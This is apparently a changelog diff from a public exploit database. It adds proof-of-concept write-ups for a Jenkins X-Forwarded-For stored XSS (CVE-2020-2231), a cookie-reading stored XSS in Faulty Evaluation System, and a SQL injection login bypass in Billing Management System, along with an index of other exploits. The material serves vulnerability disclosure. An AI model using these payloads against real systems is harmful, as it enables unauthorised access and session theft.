DB: 2021-02-18

4 changes to exploits/shellcodes

Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path
Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path

Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS
Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting
Billing Management System 2.0 - 'email' SQL injection Auth Bypass

exploits/java/webapps/49244.txt

@@ -0,0 +1,70 @@
+# Exploit Title: Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS
+# Date: 11/12/2020
+# Exploit Author: gx1
+# Vendor Homepage: https://www.jenkins.io/
+# Software Link:  https://updates.jenkins-ci.org/download/war/
+# Version: <= 2.251 and <= LTS 2.235.3
+# Tested on: any
+# CVE :  CVE-2020-2231
+
+# References: 
+https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
+https://www.openwall.com/lists/oss-security/2020/08/12/4
+
+Vendor Description: 
+
+Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the remote address of the host starting a build via 'Trigger builds remotely'.
+This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token.
+Jenkins 2.252, LTS 2.235.4 escapes the remote address of the host.
+
+Technical Details and Exploitation: 
+
+When a build of a project is completed, Jenkins returns a message in completed build process. Build process is present in build history view. 
+The message reflects the username, for example "Started by user gx1". 
+Anyway, when 'Trigger builds remotely feature' is enabled, instead of the username the remote client IP is reflected, i.e.: 
+Started by remote host '<client-ip-address>'.
+To understand how remote build trigger works, have a look at this post: https://narenchejara.medium.com/trigger-jenkins-job-remotely-using-jenkins-api-20973618a493
+The message "Starte by remote <client-ip-address> is not escaped. This could seem without security issues because the user cannot change the remote IP, right? This is not completely true... when the application server is behind a proxy, "remote client IP" is not available, as the request comes from the proxy. 
+In these cases, X-Headers are used to allow the application server to understand the real client information. A common header is X-Forwarded-For:  X-Forwarded-For HTTP header is inserted by load balancers into the data stream to identify the address of the connecting client system.  
+
+To exploit the vulnerability the attacker requires several conditions: 
+- Remote build should be enabled and if needed the attackers should have obtained API authentication token or should have Job/Configure permission
+- Application server that hosts Jenkins should use some X-Header to override client IP. This happens often, because usually the application server is under proxy, and in order to obtain client IP, override mechanisms are used.
+For example, in Apache Tomcat, it is possible to configure X-Forwarded-For heaer processing, as described in https://dacurry-tns.github.io/deploying-apereo-cas/setup_tomcat_configure-xforwardedfor-header-processing.html. 
+
+Proof Of Concept:  
+
+1. Identify the X-Header that is used by the Application Server to override proxy ip. Let's suppose that "X-Forwarded-For" is used. In this condition, the attacker can inject malicious payloads in "X-Forwarded-For" header value to exploit the vulnerability; 
+2. Send the following request:     
+
+GET /job/<project_name>/build?token=<token> HTTP/1.1
+Host: <jenkins_host>:8080
+X-Forwarded-For: gx1<script>alert(1);</script>
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: JSESSIONID=88DD2A6297E0E0FE9A59B310CA271715; screenResolution=1220x686
+Connection: close
+
+HTTP/1.1 201 
+Cache-Control: private
+Expires: Thu, 01 Jan 1970 00:00:00 GMT
+X-Content-Type-Options: nosniff
+Location: http://<vulnenv>:8080/jenkins/queue/item/7/
+Content-Length: 0
+Date: Fri, 11 Dec 2020 17:04:06 GMT
+Connection: close
+
+<project_name> is the project that can be remotely built by using <token>. 
+
+3. To trigger the XSS, navigate the build item present in the build history when the build is finished. For example, if the build current finished process is #16, stored XSS is present in 
+http://<jenkins_host>/job/<project_name>/16/
+
+Solution: 
+
+The following releases contain fixes for security vulnerabilities:
+* Jenkins 2.252
+* Jenkins LTS 2.235.4

exploits/php/webapps/49569.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting
+# Date: 2021-02-16
+# Exploit Author: Suresh Kumar
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html
+# Software: Faulty Evaluation System 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+# Vulnerable Page: http://localhost/evaluation/student/list
+# Vulnerable functionality: 'Student'
+# Vulnerable Input Field : {Firtstname} {Lastname} {Middle Name}
+# Payload used:
+
+<a onmouseover="alert(document.cookie)">xxs link</a>
+
+# POC: Whenever we will go to the page (
+http://localhost/evaluation/student/list) where the script is injected, the stored script will be executed.
+# You will see your Javascript code (XSS) executed.

exploits/php/webapps/49570.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Billing Management System 2.0 - 'email' SQL injection Auth Bypass
+# Date: 2021-02-16
+# Exploit Author: Pintu Solanki
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
+# Software: Billing Management System 2.0
+# Vulnerability Type: SQL injection - Auth Bypass
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+# This application is vulnerable to SQL injection vulnerability.
+# Vulnerable Page: http://localhost/smartbilling/smartbilling_source_code/index.php
+# Payload used:
+
+Username => admin' or '1'='1
+Password => admin' or '1'='1
+
+# POC: Whenever we will go to the page (http://localhost/smartbilling/smartbilling_source_code/index.php) when we inject SQL Payload then we will directly enter into the admin page.

exploits/windows/local/49548.txt

@@ -1,4 +1,4 @@
-# Exploit Title: Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path
+# Exploit Title: Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path
 # Discovery by: Hector Gerbacio
 # Discovery Date: 2021-02-05
 # Vendor Homepage: https://epson.com.mx/

files_exploits.csv

@@ -11263,7 +11263,7 @@ id,file,description,date,author,type,platform,port
 49530,exploits/windows/local/49530.txt,"Millewin 13.39.146.1 - Local Privilege Escalation",2021-02-08,"Andrea Intilangelo",local,windows,
 49535,exploits/windows/local/49535.txt,"AMD Fuel Service - 'Fuel.service' Unquote Service Path",2021-02-08,"Hector Gerbacio",local,windows,
 49541,exploits/windows/local/49541.html,"Microsoft Internet Explorer 11 32-bit - Use-After-Free",2021-02-08,"Forrest Orr",local,windows,
-49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path",2021-02-09,"Hector Gerbacio",local,windows,
+49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path",2021-02-09,"Hector Gerbacio",local,windows,
 49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,
 49563,exploits/android/local/49563.txt,"Tasks 9.7.3 - Insecure Permissions",2021-02-15,"Lyhin\'s Lab",local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
@@ -43518,6 +43518,7 @@ id,file,description,date,author,type,platform,port
 49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
 49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
 49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
+49244,exploits/java/webapps/49244.txt,"Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS",2020-12-14,gx1,webapps,java,
 49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,
 49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,
 49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,
@@ -43757,3 +43758,5 @@ id,file,description,date,author,type,platform,port
 49562,exploits/php/webapps/49562.sh,"Teachers Record Management System 1.0 - 'searchteacher' SQL Injection",2021-02-15,"Soham Bakore",webapps,php,
 49564,exploits/php/webapps/49564.txt,"Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass",2021-02-16,"Christian Vierschilling",webapps,php,
 49565,exploits/php/webapps/49565.txt,"BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)",2021-02-16,"Kamaljeet Kumar",webapps,php,
+49569,exploits/php/webapps/49569.txt,"Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-17,"Suresh Kumar",webapps,php,
+49570,exploits/php/webapps/49570.txt,"Billing Management System 2.0 - 'email' SQL injection Auth Bypass",2021-02-17,"Pintu Solanki",webapps,php,